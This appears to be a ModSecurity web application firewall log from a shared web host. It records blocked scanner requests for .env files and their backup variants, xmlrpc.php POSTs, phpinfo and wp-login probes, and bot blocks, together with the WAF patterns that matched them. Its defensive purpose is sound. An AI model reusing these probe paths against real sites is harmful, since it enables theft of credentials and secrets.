[Tue May 26 15:39:46.968037 2026] [security2:error] [pid 733610:tid 733749] [client 103.153.130.62:56199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxasLL_4PasUNKBsfKhwAAAAk"]
[Tue May 26 15:39:47.243275 2026] [security2:error] [pid 733610:tid 733787] [client 208.84.100.247:18506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.production.copy"] [unique_id "ahVxa8LL_4PasUNKBsfKiwAAAC8"]
[Tue May 26 15:39:47.938649 2026] [security2:error] [pid 733610:tid 733850] [client 208.84.100.247:18790] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.old"] [unique_id "ahVxa8LL_4PasUNKBsfKsgAAAG4"]
[Tue May 26 15:39:47.940295 2026] [security2:error] [pid 733610:tid 733748] [client 208.84.100.247:18806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.backup"] [unique_id "ahVxa8LL_4PasUNKBsfKswAAAAg"]
[Tue May 26 15:39:47.940390 2026] [security2:error] [pid 733610:tid 733765] [client 208.84.100.247:18872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.copy"] [unique_id "ahVxa8LL_4PasUNKBsfKtAAAABk"]
[Tue May 26 15:39:47.941056 2026] [security2:error] [pid 733610:tid 733790] [client 208.84.100.247:18856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.orig"] [unique_id "ahVxa8LL_4PasUNKBsfKtQAAADI"]
[Tue May 26 15:39:47.943049 2026] [security2:error] [pid 733610:tid 733865] [client 208.84.100.247:18772] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.bak"] [unique_id "ahVxa8LL_4PasUNKBsfKuQAAAH0"]
[Tue May 26 15:39:47.943068 2026] [security2:error] [pid 733610:tid 733833] [client 208.84.100.247:18840] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.swp"] [unique_id "ahVxa8LL_4PasUNKBsfKuwAAAF0"]
[Tue May 26 15:39:47.943854 2026] [security2:error] [pid 733610:tid 733771] [client 208.84.100.247:18816] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env~"] [unique_id "ahVxa8LL_4PasUNKBsfKvwAAAB8"]
[Tue May 26 15:39:47.943857 2026] [security2:error] [pid 733610:tid 733820] [client 208.84.100.247:18940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.local.copy"] [unique_id "ahVxa8LL_4PasUNKBsfKvgAAAFA"]
[Tue May 26 15:39:47.945524 2026] [security2:error] [pid 733610:tid 733801] [client 208.84.100.247:18888] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.local.old"] [unique_id "ahVxa8LL_4PasUNKBsfKwgAAAD0"]
[Tue May 26 15:39:47.947562 2026] [security2:error] [pid 733610:tid 733775] [client 208.84.100.247:18904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.local.backup"] [unique_id "ahVxa8LL_4PasUNKBsfKxwAAACM"]
[Tue May 26 15:39:47.948019 2026] [security2:error] [pid 733610:tid 733756] [client 208.84.100.247:18948] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.production.bak"] [unique_id "ahVxa8LL_4PasUNKBsfKxAAAABA"]
[Tue May 26 15:39:47.948279 2026] [security2:error] [pid 733610:tid 733782] [client 208.84.100.247:18920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.local~"] [unique_id "ahVxa8LL_4PasUNKBsfKyQAAACo"]
[Tue May 26 15:39:47.948328 2026] [security2:error] [pid 733610:tid 733762] [client 208.84.100.247:18922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.local.swp"] [unique_id "ahVxa8LL_4PasUNKBsfKygAAABY"]
[Tue May 26 15:39:47.948896 2026] [security2:error] [pid 733610:tid 733797] [client 208.84.100.247:18924] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.local.orig"] [unique_id "ahVxa8LL_4PasUNKBsfKxgAAADk"]
[Tue May 26 15:39:47.956703 2026] [security2:error] [pid 733610:tid 733827] [client 208.84.100.247:18962] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.production.old"] [unique_id "ahVxa8LL_4PasUNKBsfKywAAAFc"]
[Tue May 26 15:39:47.958246 2026] [security2:error] [pid 733610:tid 733789] [client 208.84.100.247:18828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.local.bak"] [unique_id "ahVxa8LL_4PasUNKBsfKzAAAADE"]
[Tue May 26 15:39:48.071613 2026] [security2:error] [pid 733610:tid 733854] [client 208.84.100.247:18988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.production.swp"] [unique_id "ahVxbMLL_4PasUNKBsfK1gAAAHI"]
[Tue May 26 15:39:48.073279 2026] [security2:error] [pid 733610:tid 733807] [client 208.84.100.247:19002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.production.orig"] [unique_id "ahVxbMLL_4PasUNKBsfK1wAAAEM"]
[Tue May 26 15:39:48.073902 2026] [security2:error] [pid 733610:tid 733808] [client 208.84.100.247:19006] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.production.backup"] [unique_id "ahVxbMLL_4PasUNKBsfK2AAAAEQ"]
[Tue May 26 15:39:48.116454 2026] [security2:error] [pid 733610:tid 733828] [client 208.84.100.247:18978] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "autodiscover.chettinadavenue.com"] [uri "/.env.production~"] [unique_id "ahVxbMLL_4PasUNKBsfK2QAAAFg"]
[Tue May 26 15:39:48.316702 2026] [security2:error] [pid 733610:tid 733786] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxa8LL_4PasUNKBsfKsAAAAC4"]
[Tue May 26 15:39:48.559273 2026] [security2:error] [pid 733610:tid 733817] [client 223.123.38.127:15216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxbMLL_4PasUNKBsfK3wAAAE0"]
[Tue May 26 15:39:48.559437 2026] [security2:error] [pid 733610:tid 733817] [client 223.123.38.127:15216] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxbMLL_4PasUNKBsfK3wAAAE0"]
[Tue May 26 15:39:49.533781 2026] [security2:error] [pid 733610:tid 733772] [client 5.255.126.59:38234] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxbcLL_4PasUNKBsfK-QAAACA"]
[Tue May 26 15:39:50.071360 2026] [security2:error] [pid 733610:tid 733774] [client 195.178.110.34:54048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.d2cargo.com"] [uri "/phpinfo.php"] [unique_id "ahVxbsLL_4PasUNKBsfLDwAAACI"]
[Tue May 26 15:39:50.376318 2026] [security2:error] [pid 733610:tid 733670] [remote 46.101.54.125:45690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 125.54.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVxbsLL_4PasUNKBsfLFgAANzs"]
[Tue May 26 15:39:50.552545 2026] [security2:error] [pid 733610:tid 733743] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxbsLL_4PasUNKBsfLFQAAAAM"]
[Tue May 26 15:39:51.664132 2026] [security2:error] [pid 733610:tid 733780] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxb8LL_4PasUNKBsfLPgAAACg"]
[Tue May 26 15:39:52.117917 2026] [security2:error] [pid 733610:tid 733755] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxb8LL_4PasUNKBsfLSQAAAA8"]
[Tue May 26 15:39:53.208932 2026] [security2:error] [pid 733610:tid 733846] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxccLL_4PasUNKBsfLeQAAAGo"]
[Tue May 26 15:39:53.790998 2026] [security2:error] [pid 733610:tid 733835] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxccLL_4PasUNKBsfLiAAAAF8"], referer: https://bloggertarget.com/asset-manifest.json
[Tue May 26 15:39:54.218410 2026] [security2:error] [pid 733610:tid 733828] [client 223.123.38.127:15217] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxcsLL_4PasUNKBsfLmAAAAFg"]
[Tue May 26 15:39:54.218561 2026] [security2:error] [pid 733610:tid 733828] [client 223.123.38.127:15217] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxcsLL_4PasUNKBsfLmAAAAFg"]
[Tue May 26 15:39:55.002270 2026] [security2:error] [pid 733610:tid 733859] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxcsLL_4PasUNKBsfLpAAAAHc"]
[Tue May 26 15:39:55.148024 2026] [security2:error] [pid 733610:tid 733805] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxc8LL_4PasUNKBsfLrwAAAEE"]
[Tue May 26 15:39:55.654115 2026] [security2:error] [pid 733610:tid 733863] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxc8LL_4PasUNKBsfLvQAAAHs"], referer: https://bloggertarget.com/manifest.json
[Tue May 26 15:39:56.159678 2026] [security2:error] [pid 733610:tid 733747] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxdMLL_4PasUNKBsfLzQAAAAc"]
[Tue May 26 15:39:56.369317 2026] [security2:error] [pid 733610:tid 733842] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxc8LL_4PasUNKBsfLzAAAAGY"]
[Tue May 26 15:39:56.652133 2026] [security2:error] [pid 733610:tid 733819] [client 107.150.120.129:38122] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "kingsclubbanquet.com"] [uri "/"] [unique_id "ahVxdMLL_4PasUNKBsfL4wAAAE8"]
[Tue May 26 15:39:57.297020 2026] [security2:error] [pid 733610:tid 733777] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxdcLL_4PasUNKBsfL7QAAACU"], referer: https://bloggertarget.com/build-manifest.json
[Tue May 26 15:39:57.355029 2026] [security2:error] [pid 733610:tid 733795] [client 103.153.130.62:56464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxdcLL_4PasUNKBsfL7gAAADc"]
[Tue May 26 15:39:57.355175 2026] [security2:error] [pid 733610:tid 733795] [client 103.153.130.62:56464] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxdcLL_4PasUNKBsfL7gAAADc"]
[Tue May 26 15:39:57.432085 2026] [security2:error] [pid 733610:tid 733861] [client 195.178.110.34:33514] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/portal/.env"] [unique_id "ahVxdcLL_4PasUNKBsfL_gAAAHk"]
[Tue May 26 15:39:57.916207 2026] [security2:error] [pid 733610:tid 733847] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxdcLL_4PasUNKBsfMBQAAAGs"]
[Tue May 26 15:39:58.445592 2026] [security2:error] [pid 733610:tid 733764] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxdsLL_4PasUNKBsfMFAAAABg"], referer: https://bloggertarget.com/_next/static/buildManifest.js
[Tue May 26 15:39:58.476853 2026] [security2:error] [pid 733610:tid 733798] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxdsLL_4PasUNKBsfMEAAAADo"]
[Tue May 26 15:39:58.819341 2026] [security2:error] [pid 733610:tid 733773] [client 185.191.171.11:25612] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVxdsLL_4PasUNKBsfMIgAAACE"]
[Tue May 26 15:39:58.819457 2026] [security2:error] [pid 733610:tid 733773] [client 185.191.171.11:25612] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVxdsLL_4PasUNKBsfMIgAAACE"]
[Tue May 26 15:39:59.394804 2026] [security2:error] [pid 733610:tid 733852] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxd8LL_4PasUNKBsfMMQAAAHA"]
[Tue May 26 15:40:00.528542 2026] [security2:error] [pid 733610:tid 733789] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxeMLL_4PasUNKBsfMVQAAADE"]
[Tue May 26 15:40:01.773312 2026] [security2:error] [pid 733610:tid 733864] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxecLL_4PasUNKBsfMewAAAHw"], referer: https://bloggertarget.com/_next/build-manifest.json
[Tue May 26 15:40:03.258778 2026] [security2:error] [pid 733610:tid 733836] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxe8LL_4PasUNKBsfMpgAAAGA"]
[Tue May 26 15:40:03.551087 2026] [security2:error] [pid 733610:tid 733850] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxe8LL_4PasUNKBsfMpwAAAG4"]
[Tue May 26 15:40:03.963564 2026] [security2:error] [pid 733610:tid 733865] [client 5.255.126.59:38254] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxe8LL_4PasUNKBsfMtwAAAH0"], referer: https://bloggertarget.com/.next/build-manifest.json
[Tue May 26 15:40:04.728702 2026] [security2:error] [pid 733610:tid 733851] [client 223.123.38.127:15218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxfMLL_4PasUNKBsfMygAAAG8"]
[Tue May 26 15:40:04.728818 2026] [security2:error] [pid 733610:tid 733851] [client 223.123.38.127:15218] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxfMLL_4PasUNKBsfMygAAAG8"]
[Tue May 26 15:40:05.006398 2026] [security2:error] [pid 733610:tid 733789] [client 5.255.126.59:38272] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxfMLL_4PasUNKBsfMzQAAADE"]
